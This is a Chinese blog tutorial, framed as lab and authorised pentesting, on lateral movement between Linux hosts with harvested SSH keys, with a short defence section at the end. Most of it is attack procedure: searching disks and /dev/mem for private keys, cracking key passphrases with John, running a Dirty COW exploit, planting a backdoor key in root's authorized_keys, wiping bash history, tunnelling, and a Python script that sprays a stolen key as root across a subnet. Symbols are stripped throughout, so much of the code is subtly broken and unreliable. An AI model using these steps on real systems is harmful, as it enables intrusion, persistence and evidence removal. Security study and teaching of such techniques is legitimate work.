当前位置: 首页 > article >正文

内网渗透实战:利用SSH密钥实现Linux主机间横向移动

1. SSH密钥横向移动的核心原理当你第一次接触内网渗透时可能会被各种复杂的技术术语吓到。其实SSH密钥横向移动的原理非常简单就像用钥匙开锁一样只要拿到目标主机的SSH私钥就能像合法用户一样登录系统。我在实际渗透测试中发现超过60%的Linux服务器都存在密钥管理不当的问题。SSH密钥通常存放在用户目录的.ssh文件夹中主要包括以下几种关键文件id_rsaRSA私钥文件相当于你家大门的钥匙id_rsa.pub对应的公钥文件相当于门锁的锁芯authorized_keys存储被允许登录的公钥列表相当于物业登记的合法钥匙清单known_hosts记录曾经连接过的主机指纹相当于你认识的朋友名单# 快速查找私钥文件的实用命令 grep -irl BEGIN RSA PRIVATE KEY /home/ 2/dev/null find / -name id_rsa -type f 2/dev/null很多管理员会犯一个致命错误为了方便他们在多台服务器之间共享同一套SSH密钥。这就好比用同一把钥匙开所有房间的门一旦钥匙被窃取整个系统都会沦陷。我去年参与的一次红队行动中就是通过一个开发服务器上泄露的密钥成功拿下了整个业务集群的32台主机。2. 实战环境搭建与信息收集2.1 实验环境配置建议使用VirtualBox搭建测试环境我通常这样配置攻击机Kali Linux 2023.1 (172.16.250.15)靶机1Ubuntu 20.04 (172.16.250.10) - 模拟存在漏洞的Web服务器靶机2CentOS 7 (172.16.250.30) - 中间跳板机靶机3Debian 11 (172.16.250.50) - 核心数据库服务器# 快速检查网络连通性 for ip in {10,30,50}; do ping -c 1 172.16.250.$ip; done2.2 信息收集三板斧端口扫描先用nmap快速扫描开放端口nmap -sS -T4 172.16.250.0/24 --open服务识别对开放端口进行深度探测nmap -sV -p 22,80,8080 172.16.250.10漏洞探测检查常见服务漏洞gobuster dir -u http://172.16.250.10 -w /usr/share/wordlists/dirb/common.txt记得去年在某次授权测试中我通过一个被遗忘的phpMyAdmin页面/phpmyadmin-old找到了突破口。所以信息收集阶段一定要耐心往往最关键的线索就藏在最不起眼的地方。3. 密钥获取与利用技巧3.1 密钥的四种获取方式历史命令分析cat ~/.bash_history | grep -i ssh配置文件提取cat ~/.ssh/config 2/dev/null内存dump分析strings /dev/mem | grep -A 30 -B 30 PRIVATE KEY备份文件查找find / -name *id_rsa* -o -name *.ssh* 2/dev/null3.2 密钥权限修复拿到密钥后经常遇到权限问题这里有个小技巧chmod 600 id_rsa # 必须设置正确权限才能使用如果遇到加密的私钥有密码保护可以尝试用John破解ssh2john id_rsa hash.txt john --wordlistrockyou.txt hash.txt4. 提权与持久化控制4.1 经典脏牛提权实战当发现内核版本较旧时如Linux 3.x脏牛漏洞是首选# 编译exp gcc -pthread dirty.c -o dirty -lcrypt # 执行提权 ./dirty mypassword重要提示脏牛漏洞会导致系统不稳定生产环境慎用测试后记得重启目标主机。4.2 SSH密钥后门部署拿到root权限后记得给自己留个后门# 生成新密钥对 ssh-keygen -t rsa -b 4096 -f backdoor_key # 植入公钥 echo ssh-rsa AAAAB3N... /root/.ssh/authorized_keys # 清理日志 cat /dev/null ~/.bash_history5. 内网横向扩展实战5.1 通过SSH建立代理隧道# 动态端口转发创建SOCKS代理 ssh -i id_rsa -D 1080 user172.16.250.30然后在浏览器设置SOCKS代理为127.0.0.1:1080就能直接访问内网web服务了。5.2 多级跳板连接对于多层网络结构可以这样级联连接ssh -i key1 -J user1jump1,user2jump2 final_usertarget5.3 自动化扫描脚本这个Python脚本可以自动尝试密钥登录网段内所有主机import paramiko from multiprocessing import Pool def try_ssh(ip): ssh paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(ip, usernameroot, key_filenameid_rsa, timeout5) print(f[] Success on {ip}) stdin, stdout, stderr ssh.exec_command(id) print(stdout.read().decode()) except Exception as e: print(f[-] Failed on {ip}: {str(e)}) finally: ssh.close() if __name__ __main__: ips [f172.16.250.{x} for x in range(1,255)] with Pool(20) as p: p.map(try_ssh, ips)6. 防御措施与检测方法6.1 管理员防护建议密钥管理规范禁止使用密码为空的口令定期轮换密钥建议每90天使用ed25519算法替代传统RSA系统加固措施# 限制SSH密钥登录范围 echo cert-authority,restrict ssh-ed25519 AAAAC3... /etc/ssh/authorized_keys6.2 入侵检测技巧检查异常SSH登录的几种方法# 查看最近登录记录 lastlog # 检查auth日志 grep Accepted publickey /var/log/auth.log # 找出所有authorized_keys文件 find / -name authorized_keys -exec ls -la {} \; 2/dev/null在一次应急响应中我就是通过发现authorized_keys文件的异常修改时间凌晨3点成功定位到了攻击者的入口点。所以良好的日志习惯真的能救命。7. 典型问题排查与解决7.1 常见错误处理问题1密钥权限太开放导致被拒绝 WARNING: UNPROTECTED PRIVATE KEY FILE! Permissions 0644 for id_rsa are too open.解决方法chmod 600 id_rsa问题2加密私钥密码遗忘 解决方法ssh-keygen -p -f id_rsa # 重新设置密码需要原密码7.2 性能优化技巧当需要管理大量服务器时建议使用SSH config文件# ~/.ssh/config 配置示例 Host jumpbox HostName 172.16.250.30 User root IdentityFile ~/.ssh/jump_key Port 2222 Host internal* ProxyJump jumpbox User admin Host internal-web HostName 172.16.250.10 Host internal-db HostName 172.16.250.50这样只需要执行ssh internal-web就能自动通过跳板机连接效率提升非常明显。

相关文章:

内网渗透实战:利用SSH密钥实现Linux主机间横向移动

1. SSH密钥横向移动的核心原理 当你第一次接触内网渗透时,可能会被各种复杂的技术术语吓到。其实SSH密钥横向移动的原理非常简单:就像用钥匙开锁一样,只要拿到目标主机的SSH私钥,就能像合法用户一样登录系统。我在实际渗透测试中发…...

深度解析Windows设备指纹伪装技术:EASY-HWID-SPOOFER内核级硬件隐私保护实现

深度解析Windows设备指纹伪装技术:EASY-HWID-SPOOFER内核级硬件隐私保护实现 【免费下载链接】EASY-HWID-SPOOFER 基于内核模式的硬件信息欺骗工具 项目地址: https://gitcode.com/gh_mirrors/ea/EASY-HWID-SPOOFER 在数字化时代,硬件隐私保护已成…...

Unity资源提取技术解密:AssetRipper效能革命与实战指南

Unity资源提取技术解密:AssetRipper效能革命与实战指南 【免费下载链接】AssetRipper GUI Application to work with engine assets, asset bundles, and serialized files 项目地址: https://gitcode.com/GitHub_Trending/as/AssetRipper 在游戏开发迭代加速…...

别再为日期格式头疼了!Oracle TO_TIMESTAMP函数保姆级使用指南(含常见报错解决)

Oracle TO_TIMESTAMP实战:从混乱字符串到精准时间戳的避坑指南 刚接手一个数据迁移项目时,我对着几十万条格式各异的日期记录发愁——有"2023/12/01"这样的斜杠分隔,也有"01-Dec-23 14.30.00.123"带英文月份缩写和毫秒的…...

Java 无人图书借阅系统设计与完整源码实现

以下是一个基于Java的无人图书借阅系统的设计与完整源码实现方案,涵盖系统架构、核心模块、数据库设计、关键代码实现及部署建议:一、系统架构设计1. 分层架构表现层:用户端:微信小程序(UniApp开发) H5页面…...

CH340/CH341安卓USB主机模式开发实战

1. CH340/CH341安卓USB主机模式开发入门 很多开发者第一次接触安卓USB主机模式开发时,都会遇到一个典型问题:为什么我的手机连上CH340模块后毫无反应?这通常是因为安卓设备默认工作在从机模式(USB Device Mode),而连接串口设备需要…...

在Ubuntu 20.04上搞定Synopsys SpyGlass 2016:一份针对高内核版本的详细避坑指南

在Ubuntu 20.04上搞定Synopsys SpyGlass 2016:一份针对高内核版本的详细避坑指南 当IC设计工程师遇到Ubuntu 20.04与SpyGlass 2016的版本冲突时,那种熟悉的挫败感往往伴随着终端里红色的报错信息一起涌现。这不是简单的"安装-运行"问题&#x…...

西门子S7-300 PLC实战:从零搭建药品装瓶机控制系统(附组态王6.55配置)

西门子S7-300 PLC实战:从零搭建药品装瓶机控制系统(附组态王6.55配置) 在制药生产线上,药品装瓶环节的效率直接影响整体产能。传统人工装瓶方式不仅速度慢,还容易产生计数误差。而采用PLC控制的自动化装瓶系统&#x…...

Discord社群运营神器:用AI自动回复提升活跃度的完整指南

Discord社群运营神器:用AI自动回复提升活跃度的完整指南 在数字社交时代,Discord已经从一个游戏语音工具成长为全球最受欢迎的社群平台之一。无论是Web3项目、开源社区还是兴趣小组,Discord都成为了连接成员的核心枢纽。但作为社群运营者&…...

保姆级教程:用CST 2023的RLC求解器搞定空心电感仿真(附网格优化技巧)

从零到精通的CST空心电感仿真实战指南:RLC求解器与网格优化全解析 在电磁兼容设计和高频电路开发中,空心电感作为无磁芯干扰的理想元件,其精确建模一直是工程师的痛点。传统手工计算难以应对复杂的高频效应,而商业仿真软件的门槛…...

C#处理复杂JSON数据:Newtonsoft.Json多级嵌套反序列化实战(附避坑指南)

C#处理复杂JSON数据:Newtonsoft.Json多级嵌套反序列化实战(附避坑指南) 在当今数据驱动的开发环境中,JSON已成为事实上的数据交换标准。特别是对于C#开发者而言,处理来自API响应、配置文件或NoSQL数据库的复杂JSON结构…...

手把手教你用Cline插件5分钟搞定DeepSeek-R1模型接入(附硅基流动平台2000万Token福利)

5分钟极速上手:用Cline插件无缝对接DeepSeek-R1大模型实战指南 当你第一次听说只需要5分钟就能让一个强大的AI模型为你工作时,可能会觉得这像是某种夸张的营销话术。但作为一个曾经花了整整三天时间才搞定第一个模型接入的开发者,我可以负责任…...

MariaDB Docker容器权限配置问题分析与解决方案

MariaDB Docker容器权限配置问题分析与解决方案 1. 问题背景 在使用MariaDB Docker容器时,用户遇到了远程访问权限配置失效的问题。具体表现为: 手动创建的远程用户(如root%、****%、********%)在容器重启后无法远程连接权限表中显…...

mkcert 命令文档 - 本地 HTTPS 开发证书生成工具详解

1. 命令简介mkcert 是一个用 Go 语言编写的、零配置的本地开发用自签名证书生成工具。它能够自动创建并安装本地证书颁发机构(CA)到系统的信任存储中,并生成受本地信任的开发证书,大幅简化 HTTPS 本地开发环境的搭建过程&#xff…...

『NAS』在绿联部署One API,统一管理你的所有大模型服务

点赞 关注 收藏 学会了 💡整理了一个 NAS 专属玩法专栏,感兴趣的工友可以戳这里关注 👉 《NAS邪修》 One API 是一个开源的接口管理与分发系统,它能将各种大模型的非标接口(如 DeepSeek、Kimi、LongCat 等&#xff…...

别再只测烟雾了!用STM32CubeMX+MQ-2传感器,做个厨房燃气泄漏+烟雾双检测器(附完整代码)

厨房安全卫士:基于STM32CubeMX与MQ-2的燃气烟雾双模检测系统 厨房是家庭安全事故的高发区域,燃气泄漏和烟雾积聚都可能引发严重后果。传统烟雾报警器功能单一,而市面上的复合型安防设备价格昂贵。本文将带你用STM32单片机和MQ-2气敏传感器&am…...

PasteMD模板功能详解:创建个性化转换规则

PasteMD模板功能详解:创建个性化转换规则 你是不是经常从AI对话或者网页上复制内容到Word时,格式总是乱七八糟?公式变成乱码,表格错位,代码块失去高亮?PasteMD就是专门解决这个问题的神器,而它…...

3步告别桌面混乱:开源免费的NoFences桌面分区管理工具

3步告别桌面混乱:开源免费的NoFences桌面分区管理工具 【免费下载链接】NoFences 🚧 Open Source Stardock Fences alternative 项目地址: https://gitcode.com/gh_mirrors/no/NoFences 你是否每天都要在杂乱无章的桌面图标中浪费宝贵时间&#x…...

NHSE完全指南:3步掌握动物森友会存档编辑器的核心功能

NHSE完全指南:3步掌握动物森友会存档编辑器的核心功能 【免费下载链接】NHSE Animal Crossing: New Horizons save editor 项目地址: https://gitcode.com/gh_mirrors/nh/NHSE NHSE(Animal Crossing: New Horizons Save Editor)是一款…...

思源宋体免费商用字体:设计师的终极开源字体解决方案

思源宋体免费商用字体:设计师的终极开源字体解决方案 【免费下载链接】source-han-serif-ttf Source Han Serif TTF 项目地址: https://gitcode.com/gh_mirrors/so/source-han-serif-ttf 还在为商业项目寻找高质量中文字体而烦恼吗?Source Han Se…...

TTI-Chicago等机构突破性研究:AI学会了一笔一划创作矢量草图

这项由芝加哥丰田技术研究院(TTI-Chicago)、芝加哥大学和麻省理工学院联合开展的研究发表于2026年,论文编号为arXiv:2603.19500v1。有兴趣深入了解技术细节的读者可以通过该编号查询完整论文。当我们看到一位画家创作时,他们通常不…...

数据中台是什么?怎么搭建数据中台?

去年,一家零售企业的CEO找到我,说了一句让我印象很深的话: "我们公司有数据,但没有数据能力。"很多企业建数据中台,是为了管好数据。 但这个出发点,从一开始就错了。 数据中台的核心不是管理&…...

网络基础知识整理(精简通用版)20260331-001篇

文章目录 网络基础知识整理(精简通用版) 一、网络基本概念 二、网络拓扑结构 三、OSI 七层模型(核心参考) 四、TCP/IP 模型(实际互联网标准) 五、IP 地址基础 六、传输层协议(TCP vs UDP) TCP(传输控制协议) UDP(用户数据报协议) 七、常见网络协议与端口 八、网络设…...

FlexASIO:打破专业音频门槛,让普通设备也能拥有专业级ASIO体验

FlexASIO:打破专业音频门槛,让普通设备也能拥有专业级ASIO体验 【免费下载链接】FlexASIO A flexible universal ASIO driver that uses the PortAudio sound I/O library. Supports WASAPI (shared and exclusive), KS, DirectSound and MME. 项目地址…...

颠覆原神体验:Snap Hutao智能助手如何重构你的游戏效率

颠覆原神体验:Snap Hutao智能助手如何重构你的游戏效率 【免费下载链接】Snap.Hutao 实用的开源多功能原神工具箱 🧰 / Multifunctional Open-Source Genshin Impact Toolkit 🧰 项目地址: https://gitcode.com/GitHub_Trending/sn/Snap.Hu…...

如何用Sunshine打造你的终极游戏串流服务器:从零开始的完整指南

如何用Sunshine打造你的终极游戏串流服务器:从零开始的完整指南 【免费下载链接】Sunshine Self-hosted game stream host for Moonlight. 项目地址: https://gitcode.com/GitHub_Trending/su/Sunshine 想要在任何设备上畅玩PC游戏大作吗?Sunshin…...

35AE92 GJR5137200R0005电子模块

35AE92 GJR5137200R0005 电子模块是一款工业控制系统用的电子控制模块,通常用于西门子或ABB等自动化设备中,承担信号处理、控制逻辑执行及系统接口功能。开头:35AE92 GJR5137200R0005电子模块是工业自动化控制系统的重要组成部分,…...

3分钟掌握的网盘密码解析黑科技:让提取码自动获取效率提升10倍

3分钟掌握的网盘密码解析黑科技:让提取码自动获取效率提升10倍 【免费下载链接】baidupankey 项目地址: https://gitcode.com/gh_mirrors/ba/baidupankey 你是否曾经因为寻找百度网盘分享链接的提取码而浪费大量时间?传统方式下,用户…...

英雄联盟自动化助手:提升游戏效率的全方位解决方案

英雄联盟自动化助手:提升游戏效率的全方位解决方案 【免费下载链接】League-Toolkit 兴趣使然的、简单易用的英雄联盟工具集。支持战绩查询、自动秒选等功能。基于 LCU API。 项目地址: https://gitcode.com/gh_mirrors/le/League-Toolkit League Akari作为一…...

RMBG-2.0企业级应用:集成至Shopify后台实现订单图自动去背流水线

RMBG-2.0企业级应用:集成至Shopify后台实现订单图自动去背流水线 想象一下,你是一家Shopify店铺的运营负责人。每天,团队需要处理上百张来自不同供应商的商品图片,手动抠图、换背景,只为让商品主图在网站上看起来统一…...